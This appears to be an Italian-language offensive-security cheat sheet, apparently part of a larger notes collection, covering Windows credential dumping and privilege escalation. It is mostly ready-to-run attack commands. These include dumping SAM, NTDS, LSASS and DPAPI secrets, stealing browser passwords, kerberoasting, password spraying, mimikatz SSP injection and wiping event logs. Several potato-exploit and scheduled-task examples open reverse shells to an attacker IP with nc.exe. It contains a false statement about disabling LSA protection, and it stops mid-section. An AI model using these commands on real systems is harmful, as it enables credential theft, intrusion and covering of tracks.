Comandi:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" #comando CMD per una query alla chiave di registro contenenti la defaultusername e la defaultpassword

N.B: Le credenziali salvate in chiaro non sono mai una buona cosa, se si vuole utilizzare l'autologon è bene utilizzare il tool AutoLogon.exe che cripta le password in LSA

la path "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" contiene altre voci interessanti utilizzate in una tecnica di persistence

Questa sezione fa riferimento a luoghi generali, metodologie o errori di dove possano esservi delle credenziali

• Dumping di password dai registri:

Comandi:

reg query HKLM /f password /t REG_SZ /s #ricerca dei registri che contengono la parola password

• Dumping di password dal credmanager:

Comandi:

vaultcmd /list #comando per vedere se sono presenti dei vaults per le password

Nel credmanager di solito sono 2 i vaults uno web e uno windows, per recuperare quello Web esiste uno script powershell che si scarica da qui

powershell -ex bypass #comando per poter attivare lo script

Import-Module .\Get-WebCredentials.ps1 #comando per importare il modulo

Get-WebCredentials #comando per recuperare le credenziali dal vault web     

Esiste poi un tool chiamato "cmdkey", utilizzato per creare, eliminare o modificare le credenziali registrate nel credmanager può essere utilizzato con la command-line "RunAs"

cmdkey /list #comando per listare possibili credenziali salvate

runas /savecred /user:<dominio\nome utente oppure solo nome utente> cmd.exe #comando che tramite le credenziali salvate apre una nuova shell con l'utente specificato

• Dumping del SAM e del SYSTEM:

Se abbiamo la fortuna di trovare in giro un backup del SAM o del SYSTEM o ancora meglio, avere privilegi come SeBackup/SeRestore (permettono di leggere e scrivere ogni file del fileysystem bypassandro le ACL) o fare parte del gruppo Backup Operators possiamo salvarceli e dumpare le credenziali

Comandi:

reg save hklm\system C:\Users\backup\system.hive
reg save hklm\sam C:\Users\backup\sam.hive
reg save hklm\system system.bak
reg save hklm\sam sam.bak
#tipologie di comandi per salvare SAM e SYSTEM

Ricordarsi di aprire un smbserver tramite Impacket

copy C:\<path>\Systen.hive \\<ip destinazione>\<nome share>\ 
copy C:\<path>\sam.hive \\<ip destinazione>\<nome share>\ #comandi per passarsi i backup tramite SMB

secretsdump.py -sam sam.bak -system system.bak LOCAL #comando che utilizza la suite impacket per recuperare gli hash

• Dumping NTDS:

NTDS è un database contenente dati, credenziali per un domain controller, di default è situato in "C:\Windows\NTDS" e per gestirlo viene utilizzata una utility apposta chiamata "Ntdsutil"

Bisogna avere dei permessi d'amministratore

File richiesti:

C:\Windows\NTDS\ntds.dit
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY

Comandi:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\prova' q q" #comando che tramite ntdsutil fa il dump dei file richiesti

secretsdump.py -security <path SECURITY file> -system <path SYSTEM file> -ntds <path ntds.dit file> local #comando che tramite secretsdump, dumpa il DB e ottiene gli hash 

secretsdump.py -ntds <path ntds.dit file> -system <path SYSTEM file> -hashes <lmhash:nthash> LOCAL #comando alternativo da utilizzare se non si dispone del SYSTEM file

Impostazioni di default settano il ntds.dit non accessibile cioè bloccato ma tramite l'utility "diskshadow", possiamo fare un shadow copy(backup) del volume "C" su un altro volume tipo "F"

diskshadow.exe #comando che avvia diskshadow

set verbose on #comando che mette in azione la modalità verbosa

set metadata <path dove salvare i metadati>.cab #comando che imposta dove salvare i metadati della shadow copy

set context clientaccessible #comando che imposta il contenuto accessibile agli utenti

set context persistent #comando che imposta il contenuto in maniera persistente

begin backup #comando che fa partire il backup

add volume C: alias <nome alias> #comando che aggiunge il volume C per farne la shadowcopy e poi imposta un alias

create #comando che inizia la creazione

expose %cdrive% F: #comando che monta la copia del disco C nel nuovo volume F

end backup #comando che finisce il backup

exit #comando che esce da diskshadow

Infine per eliminare la shadowcopy possiamo procedere con i seguenti comandi:

vssadmin list shadows #comando per listare le shadowcopies

vssadmin delete shadows /shadow=<id della shadowcopy> #comando per listare la shadowcopy

• LAPS:

LAPS è utilizzato per la gestione centralizzata delle password, permettendo la generazione, rotazione e ripristino delle password

N.B: Questa metodologia richiede che nella macchina vittima sia presente il modulo windows per la gestione del LAPS

Comandi:

dir "C:\Program Files\LAPS\CSE" #comando per vedere se presente LAPS, infatti se presente troviamo una .dll

Get-Command *AdmPwd* #comando per capire che cmdlets possiamo utilizzare con il nome AdmPwd

Find-LAPSDelegatedGroups | fl * #comando per cercare i gruppi che possono leggere le password gestite da LAPS

Find-AdmPwdExtendedRights -Identity * #comando per cercare quale OU ha "All extended rights"

Get-LAPSComputers #comando che ottiene i computer dove è configurato il LAPS

net groups "<nome gruppo>" #comando per vedere i membri del gruppo ai quali dovremmo accedere

Get-ADComputer -Filter * | fl * #comando per listare il nome del computer con LAPS attivo, in quanto non tutti lo hanno

Get-AdmPwdPassword -ComputerName <nome computer> #comando per recuperare la LAPS password 

Esistono diversi script o tool per automatizzare la ricerca uno è possibile scaricarlo da qui.

• Credenziali di WDS:

Quando si vuole installare una stessa immagine di windows ma su più macchine nella rete è possibile utilizzare Windows Deployment Services, il quale installa la stessa image su diversi computer attraverso la rete e lo fa in maniera autonoma; può capitare che all'interno di determinati file possano esserci ancora delle credenziali

cartelle:

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

• History powershell e cmd:

Windows in un file .txt tiene traccia dei comandi powershell e cmd che vengono eseguiti e possiamo recuperarli con questi comandi:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt #comando CMD per aprire la history 

Get-ChildItem C:\Users\<nome utente>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt #comando Powershell per aprire la history

• Configurazione IIS:

IIS(Internet Information Service) è il web server di default in windows, dove è possibile che vi siano delle credenziali nel file "web.config"

Comandi:

Ecco le cartelle dove poter andare a vedere

C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Comando per recuperare eventuali credenziali:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString #comando per cercare le credenziali

• Putty proxy configurations:

Putty è un SSH client che troviamo spesso nelle windows machine, è possibile recuperare le sue proxy configuration, dove tiene le credenziali in chiaro

Comandi:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s #comando che fa una query e tenta di recuperare le credenziali

• LSASS:

Il servizio che si occupa dell'autenticazione nei sistemi windows o nell'AD, è un target fondamentale per il recupero di password hashes e ticket, può essere dumpato in diverse maniere.

Comandi:

Disponendo di una GUI alla target machine è possibile tramite task manager dumpare LSASS:

Task Manager-> lsass.exe-> Creare file di dump della memoria #passi per creare un dump del LSASS

Possiamo dumpare anche se abbiamo a disposizione procdump della SysInternal suite:

procdump.exe -accepteula -ma lsass.exe c:\Windows\lsass_dump #comando per dumpare tramite procdump

Sorge però un problema, i metodi sopra spiegati non funzionano se prima non viene disattivata la protezione LSA con i seguenti metodi:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa #path della key da cercare

RunAsPPL = 1 #value della key che va modificata in 1 per disattivare LSA

Se il tutto funziona avendo disattivato la protezione LSA, possiamo recuperare dal dump del LSASS diverse informazioni grazie al tool python "pypykatz"

pip3 install pypykatz #comando per installare pypykatz

pypykatz lsa minidump lsass.DMP #comando per recuperare le informazioni dal dump

Altrimenti se si dispone di Mimikatz, il processo puà essere velocizzato grazie ad esso

• Metasploit Keylogger:

La msfconsole dispone di un keylogger integrato che può ritornare molto utile per il recupero di eventuali password

Comandi:

keyscan_start #comando per avviare il keylogger

keyscan_dump #comando per dumpare quello che ha registrato il keylogger

keyscan_stop #comando per fermare il keylogger

per una maggiore comprensione di Metasploit andare qui

• GPP (Group Policy Preferences):

le GPP (Group Policy Preferences) fa parte delle GPO (nella sezione persistence sotto la voce gruppi vi è una spiegazione delle GPO), le GPP permettono una maggiore flessibilità nel gestire le policy e le impostazioni del computer ma inoltre permettono di registrare le credenziali in diversi casi all'interno dell'AD.

Le credenziali sono criptate con AES però la stessa Microsoft ne' ha rilasciato la chiave tra i propri Docs e tramite il tool della suite PowerSploit possiamo recuperare le credenziali

Comandi:

Import-Module .\Get-GPPPassword.ps1 #comando per importare il modulo Get-GPPPassword.ps1

Get-GPPPassword #comando del modulo

Una volta recuperate le credenziali possono essere decriptate tramite la chiave pubblicata di Microsoft

• StickyNoteas(Memo):

Un normale utente per comodità può copiare le credenziali e lasciarle nell' app Memo

Comandi:

gci C:\Users\<nome utente>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState #comando per visionare la presenza di db sqlite

Sono due le opzioni se vi sono presenti dei db .sqlite, la prima è copiarli in sqlitebrowser o utilizzare il modulo PSSQLite

1. sqlite browser:

Il primo metodo è abbastanza semplice, una volta individuati i db, vanno scaricati e aperti con il relativo software

2. PSSQLite:

Il secondo richiede che venga importato ed utilizzato il modulo PSSQLite

Comandi:

Set-ExecutionPolicy Bypass -Scope Process #comando per settare la execution policy della shell corrente in modalità Bypass

Import-Module .\PSSQLite.psd1 #comando per impotare il modulo

$db = 'C:\Users\<nome utente>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\<nome file>.sqlite' #comando per salvare la path del .sqlite target

Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap #comando per estrarre i dati tramite una query

N.B: possiamo utilizzare pure il comando strings sulla nostra machine però non è molto consigliato se il db è troppo grande

• Browser passwords:

Ogni browser permette di salvare le password offline ma tramite tool specifici è possibile recuperarle:

1. SharpChrome

.\SharpChrome.exe logins /unprotect #comando del tool sharpchrome per recuperare la password

2. Firefox decrypt

python3 firefox_decrypt.py <path al file profiles.ini> #comando del tool firefox decrypt per recuperare la password

3. Chromium-Based

.\Invoke-SharpChromium -Command "cookies <nome sito>" #comando del tool sharpchromium per recuperare le credenziali

N.B: Il codice di "SharpChromium" punta alla seguente path "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies" invece va a cambiata con la seguente path "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies"

• Microsoft Exchange:

Micorsoft exchange è il software adibito da server di posta elettronica e al suo interno vi è la possibilità di trovare delle credenziali lasciate da qualche utente

Comandi:

https://<server exchange>/autodiscover/autodiscover.xml #comando per scoprire le impostazioni del windows exchange 

https://<server exchange>/EWS/Exchange.asmx #comando per scoprire la versione del windows exchange

Il recupero della versione è possibile anche tramite uno script python chiamato get_exchange_version.py

sudo python3 get_exchange_version.py https://<mail target> #comando per utilizzare lo script e scoprire la versione

Un tool che approfondisce la ricerca di credenziali è MailSniper

Import-Module MailSniper.ps1 #comando che importa il modulo

Invoke-GlobalMailSearch -ImpersonationAccount <nome utente da impersonare> -ExchHostname <hostname server> -OutputCsv <nome file .csv> #comando che si connette al server exchange il quale poi tramite il privilegio 
"ApplicationImpersonation" (permette di vedere le altre caselle postal) farà un dump delle email contenenti termini come password, creds, ecc...

Invoke-SelfSearch -Mailbox <email target> #comando che recupera l'email dell'utente corrente le quali hanno la possibilità di contenere termini come: credentials,password e ecc..

Get-MailboxFolders -Mailbox <email target> #comando che tenta di recuperare una lista di cartelle dalla casella postale corrente

Get-GlobalAddressList -ExchHostname <email target> -UserName <dominio>\<nome utente> -Password <password> -OutFile <nome file .txt> #comando  che si connette ad Outlook web Access(OWA) e tramite la funzione "FindPeople", tenta di recuperare la global address list delle email

Invoke-PasswordSprayOWA -ExchHostname <email target> -UserList <path userlist> -Password <password> -Threads <num threads> -OutFile <nome file .txt>
Invoke-PasswordSprayEWS -ExchHostname <email target> -UserList <path userlist> -Password <password> -Threads <num threads> -OutFile <nome file .txt>
Invoke-PasswordSprayGmail -ExchHostname <email target> -UserList <path userlist> -Password <password> -Threads <num threads> -OutFile <nome file .txt>
#comandi uguali che tentano il password spray ma su servizi diversi, il primo su Oulook Web Access, il secondo su Exchange Web Services ed infine il terzo su Gmail

Invoke-UsernameHarvestOWA -ExchHostname <email target> -UserList <path userlist> -Threads <num threads> -OutFile <nome file .txt> 
Invoke-UsernameHarvestGmail -UserFile <path userlist>
#comandi uguali che tentano di recuperare user validi da servizi differenti

• File XML crittografati:

Powershell permette di fare scripting all'interno dei file XML e può capitare che all'interno del filesystem possiamo trovarci questo tipo di file:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">Administrator</S>
      <SS N="Password">010000ewfefew00d08c9ddf0115d1118c7a00c04fc297eb010000sdfds009db56a0543f441469fc81aadb02945d200000dsf0000200000few0000003660000c000010000efw000069a026f82c590fa867556fe4495ca87000048000a00sdf000100003b5bf64299ad06afde3fc9d6efe72d355000002828ad79f53f3f38ceb3d8a8c41179a54dc94cab7b17ba52d0b9fc62df</SS>
    </Props>
  </Obj>
</Objs>

N.B: il file è solo di esempio provare a decriptarlo non darà alcun risultato valido

Esistono dei comandi per recuperare la password e altri dati:

$data = Import-Clixml -Path <path file xml> #comando per importare il file all'interno di una variabile powershell

$data.GetNetworkCredential().UserName
$data.GetNetworkCredential().Domain
$data.GetNetworkCredential().Password #comandi uguali che differiscono per cosa recuperano dal file xml infatti: uno l'username, l'altro il dominio e l'ultimo la password crittografata

• Kerberoasting via Rubeus:

Il kerberoasting è la pratica di recuperare i TGS degli account SPN(Service Principal Name), questa tipologia di attacco può essere portato a termine da una macchina linux con la suite impacket ma se invece avessimo accesso ad una macchina windows è possibile eseguirlo con il tool Rubeus

Comandi:

.\Rubeus.exe kerberoast /stats #comando per listare informazioni sugli utenti vulnerabili al kerberoasting

.\Rubeus.exe kerberoast /user:<nome utente> /nowrap #comando per recuperare il TGT dell'utente specificato

• DPAPI:

Il DPAPI (Data Protection API) è una componente di windows e serve per la crittografia dei dati di un programma che utilizza le API, le chiavi utilizzate sono correlate con l'utente e con il computer in se

Informazioni necessarie per l'attacco:

1. User SID = utilizzato per cercare in una determinata cartella le masterkeys e recuperarle

2. Master key = utilizzata per accedere ai file protetti delle credenziali

3. User password = utilizzata per recuperare le masterkeys

Path dove poter trovare le credenziali e le master keys:

C:\Users\<nome utente>\AppData\Local\Microsoft\Credentials\<num identificativo>
C:\Users\<nome utente>\AppData\Roaming\Microsoft\Credentials\<num identificativo> #path dei file criptati

C:\Users\<nome utente>\AppData\Roaming\Microsoft\Protect\<sid>
C:\Users\<nome utente>\AppData\Local\Microsoft\Protect\<sid> #path dei file che contengono le master keys

Comandi:

Molti comandi saranno inerenti al tool mimikatz che offre un aiuto non indifferente, i primi due sono per listare eventuali credenziali:

vaultcmd /listcreds:"Windows Credentials" /all #comando per listare possibili windows credentials

vault::list #comando di mimikatz per listare credenziali

di seguito comandi per cercare le master keys

dpapi::cred /in:C:\Users\<nome utente>\AppData\Local\Microsoft\Credentials\<num identificativo> #comando che tenta di recuperare credenziali criptate e guid della master key

dpapi::masterkey /in:"C:\Users\<nome utente>\AppData\Roaming\Microsoft\Protect\<sid>\<num identificativo>" /sid:<sid utente target> /password:<password> /protected #comando per dumpare le master key conoscendo la password

dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<sid>\<num identificativo>" /rpc #comando per dumpare le master key senza passowrd

sekurlsa::dpapi #comando per dumpare le dpapi master keys, richiede privilegi di amministratore

lsadump::backupkeys /system:<common name dominio> /export #comando mimikatz per dumpare il backup dpapi delle master keys

Infine comandi generali per utilizzare la masterkey e per criptare e decriptare dei dati:

dpapi::cred /in:C:\Users\<nome utente>\AppData\Local\Microsoft\Credentials\<num identificativo> /masterkey:<masterkey> #comando per dumpare le credenziali utilizzando la master key

dpapi::protect /data:"<dati da criptare" #comando per criptare i dati, il blob generato va salvato in un file .bin

dpapi::blob /in:"c:\users\<nome utente>\Desktop\<file con il blob>.bin" /unprotect #comando per decriptare i dati

dpapi::masterkey /in:"C:\Users\<nome utente>\AppData\Roaming\Microsoft\Protect\<sid>\<num identificativo>" /pvk:<pvk key>.pvk #comando per decriptare la master key dell'utente tramite la key recuperata con lsadump::backupkeys

• DSRM:

DSRM (Directory Services Restore Mode) è una modalità di boot sicura per il windows server domain controller, quest'opzione abilità un amministratore locale all'interno del DC a poter riparare o persino restorare il tutto. La peculiarità di questa funzione è che assegna una password all' utente amministratore che tramite il tool Mimikatz

Comandi:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <nome computer> #comando che dumpa l'hash DSRM

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose #comando per cambiare la chiave di registro in modo che possa permetterci il pass the hash

Possiamo poi fare il pth con il tool Mimikatz

• SSPI:

SSPI (Security Support Provider Interface) è l'API che si occupa di stabilire e negoziare quale protocollo utilizzare per l'autenticazione tra due macchine, possiamo utilizzarlo a nostro vantaggio per recuperare delle credenziali

Comandi:

mimilib.dll in C:\Windows\System32\ #passo in cui dobbiamo copiare la dll di mimikatz in system32

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_SZ /d "C:\Windows\System32\main.dll" #comando per aggiungere la dll ai package del LSA

Infine riavviamo il pc e tutte le credenziali in chiaro saranno nella path "C:\Windows\System32\kiwissp.log"

Tools:

Vi sono ulteriori tool che possono aiutare con il DPAPI quali:

• DonPapi

• SharpDPAPI

Esistono diversi tool che automatizzano il recupero di credenziali quali:

• Snaffler
• Seatbelt
• Lazagne
• SessionGopher

Viene allegato pure un link con comandi e dove cercare per eventuali credenziali lasciate in giro

• StartUp directory:

La startup directory può essere utilizzata per il privilege escalation, ogni qualvolta vi è il boot del pc

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" #comando per vedere se abbiamo i permessi di writing sulla cartella StartUp

Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\<word writable folder>\<nome eseguibile da usare>.exe"
oLink.Save #questo script in vbs permette di creare un collegamento nella directory startup che punterà ad un nostro eseguibile

• Potato attacks:

I potato attacks sono una tipologia di privilege escalation di cui ogni tipo ha un nome a se

N.B: alcuni potato attacks potrebbero non più funzionare o essere stati fixxati, è bene prestare attenzione

1. Hot Potato:

L'hot potato sfrutta la misconfigurazione dei WPAD(il record WPAD è sfruttato nella sezione varie di Privesc), in cui un computer windows cerca in autonomia le impostazioni per configurare il proxy, queste impostazioni sono passate tramite un file "WPAD.dat" malevolo che redirige il traffico su un proxy malevolo e dove poi sarà possibile visionare il traffico della vittima

Link per scaricare l'eseguibile

Comandi:

Hotpotato.exe -ip <ip macchina vittima> -cmd <comando da eseguire> -disable_exhaust true -disable_defender true #comandi per utilizzare l'attacco

ES: Hotpotato.exe -ip 10.12.173.236 -disable_exhaust true -cmd “C:\Users\prova\Desktop\nc.exe 10.12.7.42 8080 -e cmd.exe” -disable_defender true

N.B: l'attacco è stato patchato con "MS16-077 WPAD Name" però ancora utilizzabile nelle macchine che non sono aggiornate

2. Rotten potato:

Il seguente attacco sfrutta: un fakeproxy locale, un RPC che gira con permessi di "NT AUTHORITY\SYSTEM", RPC alla porta 135 e 2 API call "CoGetInstanceFromIStorage" e " AcceptSecurityContext "

Funzionamento:

API call "CoGetInstanceFromIStorage" contenente IP (127.0.0.1) e porta (6666) del proxy malevolo che obbligano RPC di SYSTEM ad autenticarsi e quindi ad inviare pure una "NTLM negotiate" il proxy poi rigira il tutto alla porta 135 con RPC e tramite l'altra API call "AcceptSecurityContext" per forzare l'autenticazione locale. Il tutto continua con la risposta "NTLM Challenge" da parte della porta 135 e della API call "AcceptSecurityContext" verso il proxy malevolo, le 2 challenge vengono mischiate insieme per azzeccare la negoziazione verso RPC di SYSTEM se tutto andrà bene riceveremo una risposta "NTLM Auth" da inviare alla API call "AcceptSecurityContext" per infine autenticarsi come SYSTEM

Link per scaricare l'eseguibile

Comandi:

whoami /priv #comando per controllare se abbiamo il privilegio SeImpersonatePrivilege

use incognito #comando per caricare l'incognito in meterpreter

MSFRottenPotato.exe t c:\windows\temp\test.bat #comando per avviare rottenpotato

Rottenpotato a livello di codice sorgente aprirà sempre una shell se eseguito è possibile cambiare il suo effetto andando ad apportare modifiche al file "MSFRottenPotato.cpp" nel suo main ed infine ricompilarlo

N.B: Sopra a queste versioni Windows 10 1809 & Windows Server 2019 l'exploit non funzionerà più

3. Juicy potato:

Il funzionamento di juicy potato è identico a Rotten Potato solo che differisce per diversi aspetti: Il BITS(Background Intelligent Transfer Service) utilizzato per le API call non è disponibile e la porta 6666 è occupata. Nonostante le differenze l'exploit è ancora sfruttabile poichè il BITS non è l'unico server COM disponibile(Component Object Model, servizio interno di windows che mette in comunicazione oggetti software in un ambiente windows) ma ce ne sono altri e la porta può essere cambiata

Comandi:

Primo passo capire che privilegi si hanno, quelli che interessano a noi sono "SeImpersonate" o "SeAssignPrimaryToken"

whoami /priv #comando per controllare se abbiamo il privilegio SeImpersonatePrivilege

Una volta capiti i permessi dobbiamo capire quale CLSID (Class Identifier, un'identificatore globale ed univoco, esempio quello del BITS è 4991d34b-80a1-4291-83b6-3328366b9097) utilizzare, sono due i metodi

• Utilizzo del seguente link per la visione dei CLSID

• Utilizzo di due script il primo per ottenere i CLSID e il secondo per testarli

Infine possiamo utilizzare lo script per l'exploit

juicypotato.exe -l <porta di ascolto> -p c:\windows\system32\cmd.exe -t <modalità per creare il processo> -c {<CLSID>} #comando per avviare una shell privilegiata tramite juicypotato

N.B: Sopra a queste versioni Windows 10 1809 & Windows Server 2019 l'exploit non funzionerà più

4. Rogue Potato:

L'exploit rogue potato è possibile se abbiamo il controllo di una macchina vittima e se è accessibile la porta 135; sono 3 le componenti che prendono parte al funzionamento di rogue: RPC che runna come SYSTEM, un finto "OXID RPC Resolver" (Object Exporter Identifier, sono identificatori univoci come i CLSID ma per oggetti che sono localizzati in remoto cioè su altri computers) e una named pipe

Funzionamento:

L'eseguibile di Rogue potato indica al RPC di system di inviare una "OXIDquery" al finto resolver specificando in realtà l'ip dell'attaccante, l'ip dell'attaccante nel mentre tramite un forward con socat metterà in ascolto la porta 135 e la binderà con la porta 9999 della macchina vittima, nel giro che segue ritorniamo nella macchina vittima che tramite api call e la named pipe permetterà di eseguire comandi come SYSTEM

Comandi:

whoami /priv #comando per controllare se abbiamo il privilegio SeImpersonatePrivilege

socat tcp-listen:135,reuseaddr,fork tcp:<ip vittima>:9999 #comando per mettere in ascolto la porta 135 e bindarl con la 9999 della vittima

Link per scarica la POC

.\RoguePotato.exe -r <ip della nostra machine> -e "<comando che vogliamo eseguire tipo una revshell>" -l 9999 #comando per avviare la POC

5. Sweet Potato:

Sweet Potato è un insieme di vettori per il privilege escalation quali: Rotten Potato, Juicy Potato, PrintSpoofer e ecc...

Ecco il Link per scaricare l'eseguibile

N.B: il print service non deve essere attivo

6. Generic Potato:

Generic potato è una versione modificata di Sweet potato che tenta di eseguire il privilege escalation tramite HTTP e named pipes

Vi sono dei requisiti per poterlo sfruttare: avere il privilegio "SeImpersonatePrivilege", il sistema non deve aver avviato il print service, WinRM è attivo (Running), non avere conessioni RPC in uscita verso macchine che controlliamo e il BITS service è disattivato

Link per scaricare l'eseguibile

7. God Potato:

God Potato uno degli ultimi potato attacks creati, richiede di avere il privilegio "SeImpersonatePrivilege"

Comandi:

whoami /priv #comando per controllare i privilegi

Link per scaricare God potato

GodPotato.exe -cmd "<comando da eseguire esempio una revshell>" #comando per utilizzare GodPotato

• PrintSpoofer:

I privilegi "SeAssignPrimaryToken" o "SeImpersonatePrivilege" permettono ad un utente di runnare codice o creare nuovi processi in account di altri utenti, l'exploit lanciato da local o da un network service permette di diventare SYSTEM

• PrintSpoofer = tool che controlla se l'user ha il SeImpersonatePrivilege e poi fa il Privilege escalation a SYSTEM

Comandi:

PrintSpoofer.exe -i -c <nome comando> #comando per avviare l'eseguibile Printspoofer

• Scheduled Tasks:

Vettori di privilege escalation possono provenire da task creati mal configurati

Comandi:

schtasks /query /fo LIST /v #comando per listare tutti i tasks

schtasks /query /tn <nome task> /fo list /v #comando per ottenere info su un task

Task to Run: #parametro che indica cosa runna il task 

Run as User: #parametro che indica quale user che lo runna

icacls <Path eseguibile nel parametro Task to run> #andiamo a vedere i permessi che abbiamo sull'eseguibile

echo c:\<path nostro eseguibile> -e cmd.exe <ip> <porta> <path da sostituire del parametro Task to run> #comando che in questo caso inserisce una revshell

schtasks /run /tn vulntask #comando per avviare il task

• SeTakeOwnerShip:

Questo privilegio permette di prendere il controllo di ogni oggetto del sistema, incluso file, chiavi di registro o servizi ed è molto probabile che possa essere utilizzato per prendere di mira oggetti che runnino come SYSTEM

Comandi:

whoami /priv #comando per vedere i propri privilegi

takeown /f C:<path eseguibile> #comando che permette di prenderne il controllo

icacls C:\Windows\System32\Utilman.exe /grant <nome account>:F #Avendo il controllo non per forza abbiamo i permessi necessari, ma comunque con il SeTakeOwnerShip possiamo ottenerli con il seguente comando che modifica le ACL

copy cmd.exe <nome eseguibile> #comando per sostituire l'eseguibile 

Esiste una repo molto interessante dove, vi sono diverse POC per sfruttare i vari privilegi assegnati come nel caso del SeTakeOwnerShip è possibile trovare tutto qui, inoltre voglio allegare uno script .ps1 che se nel caso il privilegio fosse disattivato abbiamo buone probabilità di riattivarlo, è possibile trovarlo qui

• Unpatched Software:

Nella macchina target, possono esserci dei software non aggiornati all'ultima versione che possono essere vettori di Privilege escalation

Comandi:

wmic product get name,version,vendor #comando per listare software e info, non funziona sempre per tutti i programmi

Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*, HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object { $_.DisplayName -ne $null } | Select- 
Object DisplayName, DisplayVersion, InstallLocation | Sort-Object -Property DisplayName -Unique | Format-Table -AutoSize #comando powershell più corposo per listare i programmi, dovrebbe essere più performante

• Named pipes:

Le named pipes mettono in comunicazione processi o applicazioni tra di loro, sono una sorta di file che vivono in memoria e che vengono eliminate una volta lette.

Comandi:

gci \\.\pipe\ #comando powershell per listare le named pipes

accesschk.exe /accepteula -w \\.\Pipe\<named pipe> -v #comando per vedere i permessi dati ad una named pipe

Un esempio di exploit è la named pipe "pipe\WindscribeService", che permette di eseguire programmi con privilegi di amministratore, è possibile sfruttarlo a nostro vantaggio tramite il modulo di metasploit chiamato "exploit/windows/local/windscribe_windscribeservice_priv_esc"

• SeDebugPrivilege:

Il privilegio SeDebugPrivilege permette ad un utente di avere enormi poteri, in quanto permette di: prendere informazioni sensibili dalla memoria di sistema, accedere o modificare il kernel ed applicazioni, ecc...

Comandi:

Un possibile sfruttamento di questo privilegio è tramite lo script .ps1 chiamato psgetsys, lo script permetterà di creare un processo figlio, il quale erediterà il token dei permessi da un processo padre che runna come SYSTEM

import-module .\psgetsys.ps1 #comando per importare il .ps1

Get-Process <processo privilegiato> #comando per prendere il pid del processo privilegiato

[MyProcess]::CreateProcessFromParent("<pid processo>","<comando da eseguire>", "") #comando per eseguire l'exploit

Esiste una repo molto interessante dove, vi sono diverse POC per sfruttare i vari privilegi assegnati come nel caso del SeDebugPrivilege è possibile trovare tutto qui, inoltre voglio allegare uno script .ps1 che se nel caso il privilegio fosse disattivato abbiamo buone probabilità di riattivarlo, è possibile trovarlo qui

• Gruppi built-in:

I windows gruppi built-in sono gruppi di sicurezza che vengono creati quando viene installato windows stesso, questi gruppi conferiscono privilegi speciali ai membri del loro gruppo e quindi possono essere vettore per di privilege escalation

1. Backup Operators:

Il Backup Operators dispone di 2 privilegi molto importanti SeBackup e SeRestore, in parole povere permettono lettura e scrittura di ogni file del sistema ignorando le ACE, gli stessi privilegi sono utilizzati in una tecnica di persistenza proprio qui

Comandi:

Impostazioni di default settano il privilegio "SeBackup", in modalità disattivato ma tramite questo script potremmo riattivarlo ed oltre a questo ci fornirà alcuni comandi utili

whoami /priv #comando per vedere i nostri prvilegi, SeBackup risulterà disattivato

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll #comandi che importano i moduli delle utils e cmdlets dello script

Set-SeBackupPrivilege #comando dello script che riattiva il privilegio

Copy-FileSeBackupPrivilege '<path file da copiare>' <path file da salvare> #comando dello script che tramite il privilegio ci permette di copiare ogni file

2. Event Log Readers:

Gruppo che ha i permessi per vedere, modificare i log di sistema

Comandi:

net localgroup "Event Log Readers" #comando per vedere i membri del gruppo

wevtutil qe <tipologia evento> /rd:true /f:text | Select-String "<stringa da cercare>" #comando che fa una query dei log più recenti che poi vengono formattati in testo per poi cercare parole chiavi

wevtutil el | Foreach-Object {wevtutil cl "$_"} #comando per eiliminare i log di sistema

3. DnsAdmins:

Il gruppo DnsAdmins permette di visionare le informazioni del DNS come gruppo e forse uno dei più utili per il privilege escalation in quanto il servizio DNS è runnato da SYSTEM quindi l'user più forte nel sistema

N.B: il seguente tipo di privilege escalation è possibile quando il DNS è stato avviato nel domain controller, se facciamo parte del gruppo DnsAdmins e se abbiamo i privilegi di stoppare e avviare i servizi

Comandi:

